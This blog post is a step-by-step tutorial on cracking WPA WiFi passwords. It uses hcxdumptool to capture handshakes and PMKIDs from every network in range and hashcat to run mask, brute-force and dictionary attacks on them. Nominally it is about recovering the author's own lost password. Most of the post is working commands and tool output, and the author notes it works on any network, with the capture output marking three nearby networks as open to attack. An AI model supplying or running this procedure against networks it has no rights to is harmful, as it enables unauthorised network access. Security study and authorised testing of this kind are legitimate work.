Recently I have been clumsy enough to lose the password to the shared WiFi. Unfortunately, as I did not get any means to retrieve it and had no access to the router, I had to get into it differently.

Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.

Today, we are going to see how to access a WiFi network when you have lost its password. It is one of the ways. There are many. This one worked pretty well because it is quick to obtain the initial data before trying to brute force the password.

For this article, we are going to need:

• Git
• A Linux distribution ♥
• hcxdumptool
• hashcat
• hcxtools
• A good computer (or a lot of coffee)

Introduction

We have two tools, hcxdumptool and hashcat. The first one will listen to the network and capture packets. From these packets, we are going to get hashed data, and hashcat is going to help us brute force these hashed data.

The first way to obtain this data is to listen to someone connecting to the router. Authentication has four steps, and we know their structure.

An alternative way is an optional field, the RSN (Robust Security Network) PMKID.

The PMKID (Pairwise Master Key Identifier) contains a hash of the PMK (Pairwise Master Key) and it is what we want to retrieve.

In both cases, it is not possible to reverse a hash. Therefore, we are going to brute force the possibilities to obtain the same hash. When the two hashes match, it means that we found the password. And that we can gain access to the network.

We don't try all the possibilities by asking the router. The brute force operation is done locally. Therefore the router is not impacted by that action.

Installation

I am always used to copying the source code of software I want to work with and that is not necessary for the system to run in the /opt/ folder, feel free to do the following operations in another folder, like your home folder, if you feel like it.

# Move in the folder you want to keep the sources in.
cd /opt/
# Let's retrieve the source code of the tools we need.
git clone https://github.com/ZerBea/hcxdumptool
git clone https://github.com/hashcat/hashcat
git clone https://github.com/ZerBea/hcxtools.git
# Let's build them and install them
(cd hcxdumptool/ && make && sudo make install)
(cd hashcat/ && make && sudo make install)
(cd hcxtools/ && make && sudo make install)

Congratulations, you are now weaponized to try accessing to any WiFi network, but of course, we are always going to use it on the network that we own.

Preparing the network interface

We need to prepare the network interface to monitor the network and be used by hcxdumptool.

During this phase you will loose internet. This blog is a WPA and content should be accessible offline. Therefore if you are lost please come back here!

First, let's find your Wifi interface

ifconfig |grep wl
wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500

Here we can see that the interface is named wlp1s0.

We need to know if some software is going to interfere. To know you can just run hcxdumptool on the interface like that:

sudo hcxdumptool -i wlp1s0

If you see lines similar to:

initialization...
warning: NetworkManager is running with pid 19085
warning: wpa_supplicant is running with pid 19012

You need to deactivate the services, in my case:

sudo service wpa_supplicant stop
sudo service NetworkManager stop

Now we are going to put it in monitor mode.

## Set interface down
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode monitor
sudo ip link set wlp1s0 up

From now on, you should not have internet anymore, if at any moment you wish to stop the procedure, and restore the card to normal state, without having to reboot, simply execute:

sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode managed
sudo ip link set wlp1s0 up
sudo service wpa_supplicant start
sudo service NetworkManager start

Getting the password

Now we are going to capture the packets we need, and we are also going to do the brute force, these operations are going to let some files, so I would recommend moving to the /tmp/ folder.

cd /tmp/

Let's capture packages. It is possible to filter the listening, but in our cases we are going to listen to all frequencies and do the filtering later.

If you know which channel to listen to you can specify it with the -c option.

If you want to look at the networks and their channels you can run:

sudo hcxdumptool -i wlp1s0  --do_rcascan

And then:

# Fullspectrum
sudo hcxdumptool -o capture.pcapng -i wlp1s0
# Knowing the network is on channel 10
sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10

You should see something like:

initialization...

start capturing (stop with ctrl+c)
INTERFACE................: wlp1s0
ERRORMAX.................: 100 errors
FILTERLIST...............: 0 entries
MAC CLIENT...............: e8041029998e
MAC ACCESS POINT.........: 000eef9848db (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64629
ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef

INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0

Here the important information is the powned=3 value. It means that we have 3 networks that are sensitive to our maneuver.

Let's take a tea for the next 10 minutes and press: ctrl+alt+c.

Once done, we are going to extract from the capture the hashed data we can use for cracking the password.

sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name

The -z is to extract the PMKID and the -o is to extract authentication from others.

This will produce three files:

• capture.16800
• capture.2500
• network_hash_name

To know if the network you want to retrieve the password for is vulnerable, there are two steps:

First, check if the name of the network is not in the capture.2500 file:

wlanhcxinfo -i capture.2500  -a -s -e| grep -a <name of the network>

The second step, if you didn't find your network yet, is to cat the network_hash_name and match the corresponding hash to the capture.16800 file.

For example:

cat network_hash_name

A list of the type: hash:network name will appear if the hash corresponding to your network is in the capture.16800 then it means that you will be able to attack it.

The easiest way to check without damaging your precious eyes:

cat capture.16800|grep <hash>

If it is there congratulation, let's run the brute force and flex our GPUs. If not, it means that probably the PMKID method is not possible. Therefore the only solution is to run hcxdumptool longer and wait for someone to connect to the access point.

If like me you have an android phone with a Wifi password registered (But you can't retrieve it, thank you android), you can connect, and it will speed up significantly the process.

Unfortunately, I only have a laptop with an Intel GPU, and therefore the process is prolonged. Intel GPU and OpenCL also have troubles, and if you are in the same case, you are going to have to deactivate securities. (sounds fun isn't it?)

WARNING: If you receive a message about self test not working with an INTEL GPU/CPU you need to install the intel openCL runtime. Don't try to deactivate self test, it will not return any result in the end.

To install the intel compute runtime.

Here are the instructions you can find on their page:

mkdir neo
cd neo
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb
sudo dpkg -i *.deb

In my specific case, I recall the start of the password. So I used a brute force approach trying digits after ibiza131...

Now based on which file contains your network:

# 2500
hashcat -m 2500 -a 3 capture.2500 ibiza131?d?d?d --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 ibiza131?d?d?d --force --increment

Here ?d means a number, --increment means it will try with various lengths, adding one extra character after exhausting the previous possibilities.

You will see something resembling:

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: capture.2500
Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs)
Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs)
Guess.Mask.......: ibiza131?d?d?d?d?d [13]
Guess.Queue......: 6/7 (85.71%)
Speed.#1.........:     5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 200000/200000 (100.00%)
Rejected.........: 0/200000 (0.00%)
Restore.Point....: 100000/100000 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ibiza13134373 -> ibiza13173737

Here you can see that we have recovered at least one.

You can check the value in the hashcat potfile:

cat ~/.hashcat/hashcat.potfile

If I didn't recall the password at all. I could have done a pure brute force of the type:

# 2500
hashcat -m 2500 -a 3 capture.2500 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment

In this case, you can also do a dictionary attack.

# 2500
hashcat -m 2500 -a 0 capture.2500  --force  my_list_of_passwords
# 16800
hashcat -m 16800 -a 0 capture.16800  --force my_list_of_passwords

You can find many lists of passwords here.

Okay, that's all folks. Now that I got back internet I can post this article. Peace out!